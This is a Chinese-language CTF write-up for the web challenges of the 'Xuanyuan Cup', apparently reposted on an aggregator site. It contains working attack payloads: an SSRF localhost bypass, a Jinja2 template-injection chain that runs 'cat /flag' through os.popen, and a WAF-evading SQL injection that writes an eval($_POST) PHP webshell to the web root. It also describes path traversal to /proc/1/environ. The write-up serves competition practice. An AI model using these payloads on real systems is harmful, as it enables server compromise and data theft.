当前位置: 首页 > news >正文

“轩辕杯“云盾砺剑 CTF挑战赛web方向题解

目录

ezjs

签到

ezssrf1.0

ezflask

ezrce

ezsql1.0

ezweb


ezjs

看到这个,直接访问getflag.php,POS提交score =100000000000

签到

6个小模块,我直接放bp的结果

1

2

3

4

5

6

ezssrf1.0

?url=http:@127.0.1/FFFFF11111AAAAAggggg.php也可以

ezflask

emmmm,我是用fenqing一把嗦的

{{((joiner['__init__']['__globals__']['__builtins__']['__i''mport__']('o''s'))['p''open']('CAT /FLAG'|lower))['read']()}}

ezrce

难点就是如何绕过这个waf

这题可以用时readgzfile

该函数用于输出一个 .gz 文件的内容

但是对于非 gzip 格式的文件,直接读取内容

这里还有一种解法:

我们可以用\符号开头,它不会影响函数的运行

ezsql1.0

outfile

into outfile '/var/www/html/1.php' - 这是SQL的文件写入操作,将查询结果写入到服务器的 /var/www/html/1.php 文件中

fuzz一波,ban了空格,select会被替换成空

空格的话这里%09和/**/都可以绕过

这里是发现有写入的权限

payload:

?id=-1%09union%09seselectlect%091,%27%3C?=eval($_POST[1]);?%3E%27,3%09into%09outfile%09%27/var/www/html/1.php%27#

访问:

直接蚁剑连接:

在/var/db.sql这里找到flag的base64编码后的值

解码即可

ezweb

这题还没有完全掌握,思路是借鉴其他师傅的

账号为fly233

密码是123456789

这里发现有个参数,那就不急着文件上传

发现可以目录便利:

最后在/proc/1/environ找到flag

http://www.xdnf.cn/news/598159.html

相关文章:

  • 【AI论文】VisualQuality-R1:通过强化学习进行推理诱导的图像质量评估
  • 【Java】异常的初步认识
  • 1.2 Box以及 InsideBox的使用
  • python字符串
  • fastadmin添加管理员账号只能查看一个表中指定条件的数据
  • 【朝花夕拾】S32K144 backdoor key解锁后劳德巴赫或者JLINK更新app
  • Python3 批量处理银行电子回单
  • 深搜题(如何找到进入下一层深搜的条件)
  • 第十九章 ADC——电压采集
  • ZeroMQ Sockets介绍及应用示例
  • 01_消息中间件概述
  • for...in 和 for...of:用法、区别
  • Vue2 项目报错问题收录(持续更新...)
  • 101个α因子#21
  • 火语言UI组件--控件事件触发
  • Vaptcha 手势、轨迹验证码
  • idea常用配置 properties中文输出乱码
  • AI智慧高光谱遥感实战精修班暨手撕99个案例项目、全覆盖技术链与应用场景一站式提升方案
  • 车载软件架构 --- FLASH bootloader 设计要点
  • 随机链表的复制问题详解与代码实现
  • python学习打卡day33
  • 等离子体隐身技术和小型等离子体防御装置设计
  • 军事目标系列之迷彩作战人员检测数据集VOC+YOLO格式2755张1类别
  • C#中WSDL文件引用问题
  • 【接近平均分配箱子数量】2022-1-23
  • uni 常用api
  • 学习STC51单片机11(芯片为STC89C52RC)
  • 嵌入式软件架构规范之 - 分层设计
  • Linux终端输入有80个字符的限制处理
  • 【com.unity3d.player.UnityPlayer介绍】